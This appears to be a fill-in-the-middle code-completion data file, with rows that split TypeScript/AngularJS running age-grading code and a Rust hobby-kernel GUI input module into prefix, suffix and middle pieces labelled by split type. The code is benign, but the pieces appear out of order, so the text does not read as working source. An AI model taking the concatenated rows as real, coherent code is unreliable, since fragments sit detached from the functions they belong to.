if (!seconds) { return seconds; }
if (!sex) { sex = 'M'; }
event = event.replace(/\s/g, '');
let mfEventId = `${sex}${event}`;
let gradedTime = seconds;
let factor = 1;
if (AgeService.GRADES[mfEventId]) {
let mfEvent = AgeService.GRADES[mfEventId];
if (mfEvent[age]) {
factor = mfEvent[age].factor;
gradedTime = seconds * factor;
}
}
console.log(`${username} ${mfEventId} age:${age} time:${seconds} factor:${factor} graded:${gradedTime}`)
return gradedTime;
}
percentGrade(event: string, sex: Sex, seconds: number, username?: string): number {
if (!seconds) { return 0; }
if (!sex) { sex = 'M'; }
event = event.replace(/\s/g, '');
let percent = 0;
let wr;
let mfEventId = `${sex}${event}`;
if (AgeService.GRADES[mfEventId]) {
let mfEvent = AgeService.GRADES[mfEventId];
wr = mfEvent[AgeService.WORLD_RECORD];
percent = wr.record / seconds;
}
console.log(`${username} ${mfEventId} time:${seconds} WR:${wr?.record} percent:${percent}`);
return percent;
}
}
/**
* TimeService
* Time calculations -> string to number / number to string
*/
class TimeService {
toString(time: number): string {
if (!time) { return null; }
let hours = Math.floor(time / (60 * 60));
time = time - (hours * 60 * 60);
let minutes = Math.floor(time / 60);
time = time - (minutes * 60);
let seconds = time.toFixed(1);
let secondsNum = time;
if (hours) {
return `${hours}:${_.padStart(minutes+'',2,'0')}:${(secondsNum < 10 ? '0' : '') + seconds}`;
} else {
return `${minutes}:${(secondsNum < 10 ? '0' : '') + seconds}`;
}
}
toNumber(time: string): number {
if (!time) { return null; }
let parts = time.split(':').map(t => parseFloat(t));
if (parts.length == 3) {
return parts[0]*60*60 + parts[1]*60 + parseFloat(''+parts[2]);
} else {
return parts[0]*60 + parseFloat(''+parts[1]);
}
}
}
function promiseFix($rootScope) {
// await fix -- runs a digest manually on await because it doesn't naturally
Promise = ((Promise) => {
const NewPromise = function (fn) {
const promise = new Promise(fn);
promise.then((value) => {
$rootScope.$applyAsync();
return value;
}, (err) => {
$rootScope.$applyAsync();
throw err;
});
return promise;
};
// Clone the prototype
NewPromise.prototype = Promise.prototype;
// Clone all writable instance properties
for (const propertyName of Object.getOwnPropertyNames(Promise)) {
const propertyDescription = Object.getOwnPropertyDescriptor(Promise, propertyName);
if (propertyDescription.writable) {
NewPromise[propertyName] = Promise[propertyName];
}
}
return NewPromise;
})(Promise) as any;
}
function preload($http, $stateRegistry, $urlRouter, Events: Events, ageSvc: AgeService, google: GoogleSvc) {
return google.load().then(() => {
return Promise.all([
Events.list()
.then(evts => {
for (let evt of evts) {
let state = {
name: evt.state,
templateUrl: `${BASE}event.html`,
controller: 'event',
url: evt.url + "?tab",
params: {
tab: {dynamic: true}
},
controllerAs: 'EC'
};
$stateRegistry.register(state);
}
// after registering states, listen on the router
$urlRouter.sync();
$urlRouter.listen();
}),
$http.get(`${BASE}age-grade.txt`)
.then(x => x.data)
.then(data => {
AgeService.parse(data);
})
]);
});
}
angular
.module('ar', ['ui.router'])
.config(['$stateProvider', '$sceDelegateProvider', '$urlRouterProvider', '$locationProvider', function ($sp, $sce, $url, $loc) {
$sce.resourceUrlWhitelist([
'self',
`${BASE}**`
]);
$url.deferIntercept();
$sp.state({
name: 'Calendar',
templateUrl: `${BASE}calendar.html`,
controller: 'calendar',
url: '/calendar',
controllerAs: 'CC'
});
$sp.state({
name: 'Leaderboard',
templateUrl: `${BASE}leaderboard.html`,
controller: 'leaderboard',
url: '/leaderboard',
controllerAs: 'LC'
});
$url.otherwise('/calendar');
}])
.run(['$rootScope', promiseFix])
.run(['$http', '$stateRegistry', '$urlRouter', 'Events', 'AgeService', 'Google', preload])
.service('Google', GoogleSvc)
.service('Events', Events)
.service('Users', Users)
.service('Divisions', Divisions)
.service('AgeService', AgeService)
.service('TimeService', TimeService)
.service('Results', Results)
.controller('calendar', Calendar)
.controller('main', MainController)
.controller('event', EventController)
.directive('fixedTop', ['$window', function ($window) {
return {
restrict: 'A',
link: function (scope, elem, attrs, ctrl) {
let $win = angular.element($window);
let fixed = parseInt(attrs.fixedTop) || 50;
$win.on('scroll', e => {
let width = Math.max(window.innerWidth, document.documentElement.clientWidth);
if (width < 550 || $window.pageYOffset < fixed) {
elem.css({position: 'relative', top: '' });
} else {
elem.css({position: 'relative', top: ($window.pageYOffset - fixed) + 'px' });
}
});
}
};
}])
.filter('percent', ['$filter', function($filter) {
return function(input, decimals = 1) {
return $filter('number')(input * 100, decimals) + '%';
};
}]);
| buildUsers | identifier_name |
mod.rs | // "Tifflin" Kernel
// - By John Hodge (thePowersGang)
//
// Core/gui/input/mod.rs
//! GUI input managment
#[allow(unused_imports)]
use kernel::prelude::*;
use self::keyboard::KeyCode;
use core::sync::atomic::{Ordering,AtomicUsize,AtomicU8};
use kernel::sync::Mutex;
pub mod keyboard;
pub mod mouse;
#[derive(Debug)]
pub enum Event
{
KeyDown(keyboard::KeyCode),
KeyUp(keyboard::KeyCode),
KeyFire(keyboard::KeyCode),
Text([u8; 6]), // 6 bytes, as that can fit in a u64 with a 16-bit tag
MouseMove(u32,u32,i16,i16),
MouseDown(u32,u32,u8),
MouseUp(u32,u32,u8),
MouseClick(u32,u32, u8, u8),
}
struct ModKeyPair(AtomicUsize);
struct MouseCursor {
graphics_cursor: ::kernel::sync::Mutex<::kernel::metadevs::video::CursorHandle>,
}
struct InputChannel
{
//caps_active: AtomicBool, // Go DIAF capslock
shift_held: ModKeyPair,
ctrl_held: ModKeyPair,
alt_held: ModKeyPair,
//altgr: ModKeyPair, // AltGr is usually just one... but meh
last_key_pressed: AtomicU8,
//active_repeat: AtomicValue<u8>,
//repeat_start: Timestamp,
cursor: MouseCursor,
// TODO: Mutex feels too heavy, but there may be multiple mice on one channel
double_click_info: Mutex<MouseClickInfo>,
}
struct MouseClickInfo
{
button: u8,
count: u8,
time: ::kernel::time::TickCount,
x: u32,
y: u32,
}
//struct IMEState
//{
// ime_ofs: u8,
// ime_val: u32,
//}
/// Maximum time in kernel ticks between subsequent press/release events for a click/doubleclick
const DOUBLE_CLICK_TIMEOUT: u64 = 500; // 500ms
/// Maximum distance along any axis between press/release before a click is not registered
const MAX_CLICK_MOVE: u32 = 10;
static MAIN_INPUT: InputChannel = InputChannel::new();
pub fn init() {
//MAIN_INPUT.cursor.
}
fn get_channel_by_index(_idx: usize) -> &'static InputChannel {
&MAIN_INPUT
}
impl InputChannel
{
const fn new() -> InputChannel {
InputChannel {
shift_held: ModKeyPair::new(),
ctrl_held: ModKeyPair::new(),
alt_held: ModKeyPair::new(),
//altgr: ModKeyPair::new(),
cursor: MouseCursor::new(),
last_key_pressed: AtomicU8::new(KeyCode::None as u8),
double_click_info: Mutex::new(MouseClickInfo::new()),
}
}
pub fn handle_key(&self, key: keyboard::KeyCode, release: bool)
{
log_trace!("key={:?}, release={}", key, release);
match (release, key)
{
// Maintain key states
(false, KeyCode::RightShift) => self.shift_held.set_r(),
(false, KeyCode::LeftShift) => self.shift_held.set_l(),
(false, KeyCode::RightCtrl) => self.ctrl_held.set_r(),
(false, KeyCode::LeftCtrl) => self.ctrl_held.set_l(),
(false, KeyCode::RightAlt) => self.alt_held.set_r(),
(false, KeyCode::LeftAlt) => self.alt_held.set_l(),
(true, KeyCode::RightShift) => self.shift_held.clear_r(),
(true, KeyCode::LeftShift) => self.shift_held.clear_l(),
(true, KeyCode::RightCtrl) => self.ctrl_held.clear_r(),
(true, KeyCode::LeftCtrl) => self.ctrl_held.clear_l(),
(true, KeyCode::RightAlt) => self.alt_held.clear_r(),
(true, KeyCode::LeftAlt) => self.alt_held.clear_l(),
// Check for session change commands, don't propagate if they fired
// - 'try_change_session' checks for the required modifier keys and permissions
// TODO: Should this be handled by the `windows` module?
(false, KeyCode::Esc) => if self.try_change_session(0) { return ; },
(false, KeyCode::F1) => if self.try_change_session(1) { return ; },
(false, KeyCode::F2) => if self.try_change_session(2) { return ; },
(false, KeyCode::F3) => if self.try_change_session(3) { return ; },
(false, KeyCode::F4) => if self.try_change_session(4) { return ; },
(false, KeyCode::F5) => if self.try_change_session(5) { return ; },
(false, KeyCode::F6) => if self.try_change_session(6) { return ; },
(false, KeyCode::F7) => if self.try_change_session(7) { return ; },
(false, KeyCode::F8) => if self.try_change_session(8) { return ; },
(false, KeyCode::F9) => if self.try_change_session(9) { return ; },
(false, KeyCode::F10) => if self.try_change_session(10) { return ; },
(false, KeyCode::F11) => if self.try_change_session(11) { return ; },
(false, KeyCode::F12) => if self.try_change_session(12) { return ; },
_ => {},
}
let last_key = self.last_key_pressed.load(Ordering::Relaxed);
if !release {
self.last_key_pressed.store(key as u8, Ordering::Relaxed);
super::windows::handle_input(/*self, */Event::KeyDown(key));
}
// Handle fire and text events
if key.is_modifier()
{
// Only fire a modifier on key-up IF they were the last one pressed
// - This allows "Gui" (windows) to fire on key-up while still being used as a modifier
if release && last_key == key as u8
{
super::windows::handle_input( Event::KeyFire(key) );
}
}
else
{
// TODO: Support repetition (of the last non-modifier pressed)
if !release
{
super::windows::handle_input( Event::KeyFire(key) );
// TODO: Should only generate text if no non-shift modifiers are depressed
//if self.enable_input_translation {
let s = self.get_input_string(key);
if s.len() > 0 {
let mut buf = [0; 6];
buf[.. s.len()].clone_from_slice( s.as_bytes() );
super::windows::handle_input( Event::Text(buf) );
}
//}
}
}
// Send key combination to active active window (via the window subsystem)
if release {
self.last_key_pressed.store(KeyCode::None as u8, Ordering::Relaxed);
super::windows::handle_input(/*self, */Event::KeyUp(key));
}
}
pub fn handle_mouse_set(&self, norm_x: u16, norm_y: u16)
{
// Mouse movement, update cursor
let (dx,dy) = self.cursor.set_pos(norm_x, norm_y);
let (x,y) = self.cursor.pos();
self.double_click_info.lock().clear();
super::windows::handle_input(/*self, */Event::MouseMove(x, y, dx as i16, dy as i16));
}
pub fn handle_mouse_move(&self, dx: i16, dy: i16)
{
// Mouse movement, update cursor
self.cursor.move_pos(dx as i32, dy as i32);
let (x,y) = self.cursor.pos();
self.double_click_info.lock().clear();
super::windows::handle_input(/*self, */Event::MouseMove(x, y, dx, dy));
}
pub fn handle_mouse_btn(&self, btn: u8, release: bool)
{
let (x,y) = self.cursor.pos();
if release
{
// Released - check the double-click timer
if let Some(ev) = self.double_click_info.lock().check( x,y, btn )
{
super::windows::handle_input(/*self, */ev);
}
super::windows::handle_input(/*self, */Event::MouseUp(x, y, btn));
}
else
{
// Pressed - reset the double-click timer
self.double_click_info.lock().reset(x,y, btn);
super::windows::handle_input(/*self, */Event::MouseDown(x, y, btn));
}
}
fn shift(&self) -> bool {
self.shift_held.get()
}
fn upper(&self) -> bool {
self.shift()
}
fn get_input_string(&self, keycode: KeyCode) -> &str
{
macro_rules! shift { ($s:ident: $lower:expr, $upper:expr) => { if $s.shift() { $upper } else {$lower} }; }
macro_rules! alpha { ($s:ident: $lower:expr, $upper:expr) => { if $s.upper() { $upper } else {$lower} }; }
match keycode
{
KeyCode::A => alpha!(self: "a", "A"),
KeyCode::B => alpha!(self: "b", "B"),
KeyCode::C => alpha!(self: "c", "C"),
KeyCode::D => alpha!(self: "d", "D"),
KeyCode::E => alpha!(self: "e", "E"),
KeyCode::F => alpha!(self: "f", "F"),
KeyCode::G => alpha!(self: "g", "G"),
KeyCode::H => alpha!(self: "h", "H"),
KeyCode::I => alpha!(self: "i", "I"),
KeyCode::J => alpha!(self: "j", "J"),
KeyCode::K => alpha!(self: "k", "K"),
KeyCode::L => alpha!(self: "l", "L"),
KeyCode::M => alpha!(self: "m", "M"),
KeyCode::N => alpha!(self: "n", "N"),
KeyCode::O => alpha!(self: "o", "O"),
KeyCode::P => alpha!(self: "p", "P"),
KeyCode::Q => alpha!(self: "q", "Q"),
KeyCode::R => alpha!(self: "r", "R"),
KeyCode::S => alpha!(self: "s", "S"),
KeyCode::T => alpha!(self: "t", "T"),
KeyCode::U => alpha!(self: "u", "U"),
KeyCode::V => alpha!(self: "v", "V"),
KeyCode::W => alpha!(self: "w", "W"),
KeyCode::X => alpha!(self: "x", "X"),
KeyCode::Y => alpha!(self: "y", "Y"),
KeyCode::Z => alpha!(self: "z", "Z"),
KeyCode::SquareOpen => shift!(self: "[", "{"),
KeyCode::SquareClose => shift!(self: "[", "{"),
KeyCode::Backslash => shift!(self: "\\","|"),
KeyCode::Semicolon => shift!(self: ";", ":"),
KeyCode::Quote => shift!(self: "'", "\""),
KeyCode::Comma => shift!(self: ",", "<"),
KeyCode::Period => shift!(self: ".", ">"),
KeyCode::Slash => shift!(self: "/", "?"),
KeyCode::Kb1 => shift!(self: "1", "!"),
KeyCode::Kb2 => shift!(self: "2", "@"),
KeyCode::Kb3 => shift!(self: "3", "#"),
KeyCode::Kb4 => shift!(self: "4", "$"),
KeyCode::Kb5 => shift!(self: "5", "%"),
KeyCode::Kb6 => shift!(self: "6", "^"),
KeyCode::Kb7 => shift!(self: "7", "&"),
KeyCode::Kb8 => shift!(self: "8", "*"),
KeyCode::Kb9 => shift!(self: "9", "("),
KeyCode::Kb0 => shift!(self: "0", ")"),
KeyCode::Minus => shift!(self: "-", "_"),
KeyCode::Equals => shift!(self: "=", "+"),
KeyCode::Space => " ",
_ => "",
}
}
fn try_change_session(&self, target: usize) -> bool {
if self.is_master() && self.ctrl_held.get() && self.alt_held.get() {
super::windows::switch_active(target);
true
}
else {
false
}
}
fn is_master(&self) -> bool { true }
}
impl ModKeyPair {
const fn new() -> ModKeyPair {
ModKeyPair(AtomicUsize::new(0))
}
fn set_l(&self) |
fn set_r(&self) { self.0.fetch_or(2, Ordering::Relaxed); }
fn clear_l(&self) { self.0.fetch_and(!1, Ordering::Relaxed); }
fn clear_r(&self) { self.0.fetch_and(!2, Ordering::Relaxed); }
fn get(&self) -> bool {
self.0.load(Ordering::Relaxed) != 0
}
}
impl MouseCursor {
const fn new() -> MouseCursor {
MouseCursor {
graphics_cursor: ::kernel::sync::Mutex::new(::kernel::metadevs::video::CursorHandle::new()),
}
}
fn add_coord(cur: u32, d: i32) -> u32 {
if d < 0 {
u32::saturating_sub(cur, -d as u32)
}
else {
u32::saturating_add(cur, d as u32)
}
}
/// Set cursor position to normalised coordinates
fn set_pos(&self, norm_x: u16, norm_y: u16) -> (i32, i32) {
let mut lh = self.graphics_cursor.lock();
let pos = lh.get_pos();
let rect = match ::kernel::metadevs::video::get_display_for_pos(pos)
{
Ok(v) => v,
Err(v) => v,
};
let new_pos = ::kernel::metadevs::video::Pos {
x: rect.x() + ((rect.w() as u64 * norm_x as u64) >> 16) as u32,
y: rect.y() + ((rect.h() as u64 * norm_y as u64) >> 16) as u32,
};
lh.set_pos(new_pos);
(
(new_pos.x as i32 - pos.x as i32) as i32,
(new_pos.y as i32 - pos.y as i32) as i32,
)
}
fn move_pos(&self, dx: i32, dy: i32) {
let mut lh = self.graphics_cursor.lock();
let mut pos = lh.get_pos();
pos.x = Self::add_coord(pos.x, dx);
pos.y = Self::add_coord(pos.y, dy);
lh.set_pos(pos);
}
fn pos(&self) -> (u32,u32) {
let pos = self.graphics_cursor.lock().get_pos();
(pos.x, pos.y)
}
}
impl MouseClickInfo
{
const fn new() -> MouseClickInfo {
MouseClickInfo {
button: 0xFF, x: 0, y: 0,
time: 0,
count: 0,
}
}
fn clear(&mut self)
{
self.button = 0xFF;
}
fn reset(&mut self, x: u32, y: u32, button: u8)
{
self.button = button;
self.count = 0;
self.x = x;
self.y = y;
self.time = ::kernel::time::ticks();
}
fn check(&mut self, x: u32, y: u32, button: u8) -> Option<Event>
{
use kernel::lib::num::abs_diff;
if self.button != button {
self.clear();
None
}
else if (::kernel::time::ticks() - self.time) > DOUBLE_CLICK_TIMEOUT {
self.clear();
None
}
else if abs_diff(self.x, x) > MAX_CLICK_MOVE || abs_diff(self.y, y) > MAX_CLICK_MOVE {
self.clear();
None
}
else {
self.time = ::kernel::time::ticks();
self.x = x;
self.y = y;
if self.count < 0xFF {
self.count += 1;
}
Some( Event::MouseClick(x, y, button, self.count) )
}
}
}
| { self.0.fetch_or(1, Ordering::Relaxed); } | identifier_body |
mod.rs | // "Tifflin" Kernel
// - By John Hodge (thePowersGang)
//
// Core/gui/input/mod.rs
//! GUI input managment
#[allow(unused_imports)]
use kernel::prelude::*;
use self::keyboard::KeyCode;
use core::sync::atomic::{Ordering,AtomicUsize,AtomicU8};
use kernel::sync::Mutex;
pub mod keyboard;
pub mod mouse;
#[derive(Debug)]
pub enum Event
{
KeyDown(keyboard::KeyCode),
KeyUp(keyboard::KeyCode),
KeyFire(keyboard::KeyCode),
Text([u8; 6]), // 6 bytes, as that can fit in a u64 with a 16-bit tag
MouseMove(u32,u32,i16,i16),
MouseDown(u32,u32,u8),
MouseUp(u32,u32,u8),
MouseClick(u32,u32, u8, u8),
}
struct ModKeyPair(AtomicUsize);
struct MouseCursor {
graphics_cursor: ::kernel::sync::Mutex<::kernel::metadevs::video::CursorHandle>,
}
struct InputChannel
{
//caps_active: AtomicBool, // Go DIAF capslock
shift_held: ModKeyPair,
ctrl_held: ModKeyPair,
alt_held: ModKeyPair,
//altgr: ModKeyPair, // AltGr is usually just one... but meh
last_key_pressed: AtomicU8,
//active_repeat: AtomicValue<u8>,
//repeat_start: Timestamp,
cursor: MouseCursor,
// TODO: Mutex feels too heavy, but there may be multiple mice on one channel
double_click_info: Mutex<MouseClickInfo>,
}
struct MouseClickInfo
{
button: u8,
count: u8,
time: ::kernel::time::TickCount,
x: u32,
y: u32,
}
//struct IMEState
//{
// ime_ofs: u8,
// ime_val: u32,
//}
/// Maximum time in kernel ticks between subsequent press/release events for a click/doubleclick
const DOUBLE_CLICK_TIMEOUT: u64 = 500; // 500ms
/// Maximum distance along any axis between press/release before a click is not registered
const MAX_CLICK_MOVE: u32 = 10;
static MAIN_INPUT: InputChannel = InputChannel::new();
pub fn init() {
//MAIN_INPUT.cursor.
}
fn get_channel_by_index(_idx: usize) -> &'static InputChannel {
&MAIN_INPUT
}
impl InputChannel
{
const fn new() -> InputChannel {
InputChannel {
shift_held: ModKeyPair::new(),
ctrl_held: ModKeyPair::new(),
alt_held: ModKeyPair::new(),
//altgr: ModKeyPair::new(),
cursor: MouseCursor::new(),
last_key_pressed: AtomicU8::new(KeyCode::None as u8),
double_click_info: Mutex::new(MouseClickInfo::new()),
}
}
pub fn handle_key(&self, key: keyboard::KeyCode, release: bool)
{
log_trace!("key={:?}, release={}", key, release);
match (release, key)
{
// Maintain key states
(false, KeyCode::RightShift) => self.shift_held.set_r(),
(false, KeyCode::LeftShift) => self.shift_held.set_l(),
(false, KeyCode::RightCtrl) => self.ctrl_held.set_r(),
(false, KeyCode::LeftCtrl) => self.ctrl_held.set_l(),
(false, KeyCode::RightAlt) => self.alt_held.set_r(),
(false, KeyCode::LeftAlt) => self.alt_held.set_l(),
(true, KeyCode::RightShift) => self.shift_held.clear_r(),
(true, KeyCode::LeftShift) => self.shift_held.clear_l(),
(true, KeyCode::RightCtrl) => self.ctrl_held.clear_r(),
(true, KeyCode::LeftCtrl) => self.ctrl_held.clear_l(),
(true, KeyCode::RightAlt) => self.alt_held.clear_r(),
(true, KeyCode::LeftAlt) => self.alt_held.clear_l(),
// Check for session change commands, don't propagate if they fired
// - 'try_change_session' checks for the required modifier keys and permissions
// TODO: Should this be handled by the `windows` module?
(false, KeyCode::Esc) => if self.try_change_session(0) { return ; },
(false, KeyCode::F1) => if self.try_change_session(1) { return ; },
(false, KeyCode::F2) => if self.try_change_session(2) { return ; },
(false, KeyCode::F3) => if self.try_change_session(3) { return ; },
(false, KeyCode::F4) => if self.try_change_session(4) { return ; },
(false, KeyCode::F5) => if self.try_change_session(5) { return ; },
(false, KeyCode::F6) => if self.try_change_session(6) { return ; },
(false, KeyCode::F7) => if self.try_change_session(7) { return ; },
(false, KeyCode::F8) => if self.try_change_session(8) { return ; },
(false, KeyCode::F9) => if self.try_change_session(9) { return ; },
(false, KeyCode::F10) => if self.try_change_session(10) { return ; },
(false, KeyCode::F11) => if self.try_change_session(11) { return ; },
(false, KeyCode::F12) => if self.try_change_session(12) { return ; },
_ => {},
}
let last_key = self.last_key_pressed.load(Ordering::Relaxed);
if !release {
self.last_key_pressed.store(key as u8, Ordering::Relaxed);
super::windows::handle_input(/*self, */Event::KeyDown(key));
}
// Handle fire and text events
if key.is_modifier()
{
// Only fire a modifier on key-up IF they were the last one pressed
// - This allows "Gui" (windows) to fire on key-up while still being used as a modifier
if release && last_key == key as u8
{
super::windows::handle_input( Event::KeyFire(key) );
}
}
else
{
// TODO: Support repetition (of the last non-modifier pressed)
if !release
{
super::windows::handle_input( Event::KeyFire(key) );
// TODO: Should only generate text if no non-shift modifiers are depressed
//if self.enable_input_translation {
let s = self.get_input_string(key);
if s.len() > 0 {
let mut buf = [0; 6];
buf[.. s.len()].clone_from_slice( s.as_bytes() );
super::windows::handle_input( Event::Text(buf) );
}
//}
}
}
// Send key combination to active active window (via the window subsystem)
if release {
self.last_key_pressed.store(KeyCode::None as u8, Ordering::Relaxed);
super::windows::handle_input(/*self, */Event::KeyUp(key));
}
}
pub fn handle_mouse_set(&self, norm_x: u16, norm_y: u16)
{
// Mouse movement, update cursor
let (dx,dy) = self.cursor.set_pos(norm_x, norm_y);
let (x,y) = self.cursor.pos();
self.double_click_info.lock().clear();
super::windows::handle_input(/*self, */Event::MouseMove(x, y, dx as i16, dy as i16));
}
pub fn handle_mouse_move(&self, dx: i16, dy: i16)
{
// Mouse movement, update cursor
self.cursor.move_pos(dx as i32, dy as i32);
let (x,y) = self.cursor.pos();
self.double_click_info.lock().clear();
super::windows::handle_input(/*self, */Event::MouseMove(x, y, dx, dy));
}
pub fn handle_mouse_btn(&self, btn: u8, release: bool)
{
let (x,y) = self.cursor.pos();
if release
{
// Released - check the double-click timer
if let Some(ev) = self.double_click_info.lock().check( x,y, btn )
{
super::windows::handle_input(/*self, */ev);
}
super::windows::handle_input(/*self, */Event::MouseUp(x, y, btn));
}
else
{
// Pressed - reset the double-click timer
self.double_click_info.lock().reset(x,y, btn);
super::windows::handle_input(/*self, */Event::MouseDown(x, y, btn));
}
}
fn shift(&self) -> bool {
self.shift_held.get()
}
fn upper(&self) -> bool {
self.shift()
}
fn get_input_string(&self, keycode: KeyCode) -> &str
{
macro_rules! shift { ($s:ident: $lower:expr, $upper:expr) => { if $s.shift() { $upper } else {$lower} }; }
macro_rules! alpha { ($s:ident: $lower:expr, $upper:expr) => { if $s.upper() { $upper } else {$lower} }; }
match keycode
{
KeyCode::A => alpha!(self: "a", "A"),
KeyCode::B => alpha!(self: "b", "B"),
KeyCode::C => alpha!(self: "c", "C"),
KeyCode::D => alpha!(self: "d", "D"),
KeyCode::E => alpha!(self: "e", "E"),
KeyCode::F => alpha!(self: "f", "F"),
KeyCode::G => alpha!(self: "g", "G"),
KeyCode::H => alpha!(self: "h", "H"),
KeyCode::I => alpha!(self: "i", "I"),
KeyCode::J => alpha!(self: "j", "J"),
KeyCode::K => alpha!(self: "k", "K"),
KeyCode::L => alpha!(self: "l", "L"),
KeyCode::M => alpha!(self: "m", "M"),
KeyCode::N => alpha!(self: "n", "N"),
KeyCode::O => alpha!(self: "o", "O"),
KeyCode::P => alpha!(self: "p", "P"),
KeyCode::Q => alpha!(self: "q", "Q"),
KeyCode::R => alpha!(self: "r", "R"),
KeyCode::S => alpha!(self: "s", "S"),
KeyCode::T => alpha!(self: "t", "T"),
KeyCode::U => alpha!(self: "u", "U"),
KeyCode::V => alpha!(self: "v", "V"),
KeyCode::W => alpha!(self: "w", "W"),
KeyCode::X => alpha!(self: "x", "X"),
KeyCode::Y => alpha!(self: "y", "Y"),
KeyCode::Z => alpha!(self: "z", "Z"),
KeyCode::SquareOpen => shift!(self: "[", "{"), | KeyCode::Semicolon => shift!(self: ";", ":"),
KeyCode::Quote => shift!(self: "'", "\""),
KeyCode::Comma => shift!(self: ",", "<"),
KeyCode::Period => shift!(self: ".", ">"),
KeyCode::Slash => shift!(self: "/", "?"),
KeyCode::Kb1 => shift!(self: "1", "!"),
KeyCode::Kb2 => shift!(self: "2", "@"),
KeyCode::Kb3 => shift!(self: "3", "#"),
KeyCode::Kb4 => shift!(self: "4", "$"),
KeyCode::Kb5 => shift!(self: "5", "%"),
KeyCode::Kb6 => shift!(self: "6", "^"),
KeyCode::Kb7 => shift!(self: "7", "&"),
KeyCode::Kb8 => shift!(self: "8", "*"),
KeyCode::Kb9 => shift!(self: "9", "("),
KeyCode::Kb0 => shift!(self: "0", ")"),
KeyCode::Minus => shift!(self: "-", "_"),
KeyCode::Equals => shift!(self: "=", "+"),
KeyCode::Space => " ",
_ => "",
}
}
fn try_change_session(&self, target: usize) -> bool {
if self.is_master() && self.ctrl_held.get() && self.alt_held.get() {
super::windows::switch_active(target);
true
}
else {
false
}
}
fn is_master(&self) -> bool { true }
}
impl ModKeyPair {
const fn new() -> ModKeyPair {
ModKeyPair(AtomicUsize::new(0))
}
fn set_l(&self) { self.0.fetch_or(1, Ordering::Relaxed); }
fn set_r(&self) { self.0.fetch_or(2, Ordering::Relaxed); }
fn clear_l(&self) { self.0.fetch_and(!1, Ordering::Relaxed); }
fn clear_r(&self) { self.0.fetch_and(!2, Ordering::Relaxed); }
fn get(&self) -> bool {
self.0.load(Ordering::Relaxed) != 0
}
}
impl MouseCursor {
const fn new() -> MouseCursor {
MouseCursor {
graphics_cursor: ::kernel::sync::Mutex::new(::kernel::metadevs::video::CursorHandle::new()),
}
}
fn add_coord(cur: u32, d: i32) -> u32 {
if d < 0 {
u32::saturating_sub(cur, -d as u32)
}
else {
u32::saturating_add(cur, d as u32)
}
}
/// Set cursor position to normalised coordinates
fn set_pos(&self, norm_x: u16, norm_y: u16) -> (i32, i32) {
let mut lh = self.graphics_cursor.lock();
let pos = lh.get_pos();
let rect = match ::kernel::metadevs::video::get_display_for_pos(pos)
{
Ok(v) => v,
Err(v) => v,
};
let new_pos = ::kernel::metadevs::video::Pos {
x: rect.x() + ((rect.w() as u64 * norm_x as u64) >> 16) as u32,
y: rect.y() + ((rect.h() as u64 * norm_y as u64) >> 16) as u32,
};
lh.set_pos(new_pos);
(
(new_pos.x as i32 - pos.x as i32) as i32,
(new_pos.y as i32 - pos.y as i32) as i32,
)
}
fn move_pos(&self, dx: i32, dy: i32) {
let mut lh = self.graphics_cursor.lock();
let mut pos = lh.get_pos();
pos.x = Self::add_coord(pos.x, dx);
pos.y = Self::add_coord(pos.y, dy);
lh.set_pos(pos);
}
fn pos(&self) -> (u32,u32) {
let pos = self.graphics_cursor.lock().get_pos();
(pos.x, pos.y)
}
}
impl MouseClickInfo
{
const fn new() -> MouseClickInfo {
MouseClickInfo {
button: 0xFF, x: 0, y: 0,
time: 0,
count: 0,
}
}
fn clear(&mut self)
{
self.button = 0xFF;
}
fn reset(&mut self, x: u32, y: u32, button: u8)
{
self.button = button;
self.count = 0;
self.x = x;
self.y = y;
self.time = ::kernel::time::ticks();
}
fn check(&mut self, x: u32, y: u32, button: u8) -> Option<Event>
{
use kernel::lib::num::abs_diff;
if self.button != button {
self.clear();
None
}
else if (::kernel::time::ticks() - self.time) > DOUBLE_CLICK_TIMEOUT {
self.clear();
None
}
else if abs_diff(self.x, x) > MAX_CLICK_MOVE || abs_diff(self.y, y) > MAX_CLICK_MOVE {
self.clear();
None
}
else {
self.time = ::kernel::time::ticks();
self.x = x;
self.y = y;
if self.count < 0xFF {
self.count += 1;
}
Some( Event::MouseClick(x, y, button, self.count) )
}
}
} | KeyCode::SquareClose => shift!(self: "[", "{"),
KeyCode::Backslash => shift!(self: "\\","|"), | random_line_split |
mod.rs | // "Tifflin" Kernel
// - By John Hodge (thePowersGang)
//
// Core/gui/input/mod.rs
//! GUI input managment
#[allow(unused_imports)]
use kernel::prelude::*;
use self::keyboard::KeyCode;
use core::sync::atomic::{Ordering,AtomicUsize,AtomicU8};
use kernel::sync::Mutex;
pub mod keyboard;
pub mod mouse;
#[derive(Debug)]
pub enum Event
{
KeyDown(keyboard::KeyCode),
KeyUp(keyboard::KeyCode),
KeyFire(keyboard::KeyCode),
Text([u8; 6]), // 6 bytes, as that can fit in a u64 with a 16-bit tag
MouseMove(u32,u32,i16,i16),
MouseDown(u32,u32,u8),
MouseUp(u32,u32,u8),
MouseClick(u32,u32, u8, u8),
}
struct ModKeyPair(AtomicUsize);
struct MouseCursor {
graphics_cursor: ::kernel::sync::Mutex<::kernel::metadevs::video::CursorHandle>,
}
struct InputChannel
{
//caps_active: AtomicBool, // Go DIAF capslock
shift_held: ModKeyPair,
ctrl_held: ModKeyPair,
alt_held: ModKeyPair,
//altgr: ModKeyPair, // AltGr is usually just one... but meh
last_key_pressed: AtomicU8,
//active_repeat: AtomicValue<u8>,
//repeat_start: Timestamp,
cursor: MouseCursor,
// TODO: Mutex feels too heavy, but there may be multiple mice on one channel
double_click_info: Mutex<MouseClickInfo>,
}
struct MouseClickInfo
{
button: u8,
count: u8,
time: ::kernel::time::TickCount,
x: u32,
y: u32,
}
//struct IMEState
//{
// ime_ofs: u8,
// ime_val: u32,
//}
/// Maximum time in kernel ticks between subsequent press/release events for a click/doubleclick
const DOUBLE_CLICK_TIMEOUT: u64 = 500; // 500ms
/// Maximum distance along any axis between press/release before a click is not registered
const MAX_CLICK_MOVE: u32 = 10;
static MAIN_INPUT: InputChannel = InputChannel::new();
pub fn init() {
//MAIN_INPUT.cursor.
}
fn get_channel_by_index(_idx: usize) -> &'static InputChannel {
&MAIN_INPUT
}
impl InputChannel
{
const fn new() -> InputChannel {
InputChannel {
shift_held: ModKeyPair::new(),
ctrl_held: ModKeyPair::new(),
alt_held: ModKeyPair::new(),
//altgr: ModKeyPair::new(),
cursor: MouseCursor::new(),
last_key_pressed: AtomicU8::new(KeyCode::None as u8),
double_click_info: Mutex::new(MouseClickInfo::new()),
}
}
pub fn handle_key(&self, key: keyboard::KeyCode, release: bool)
{
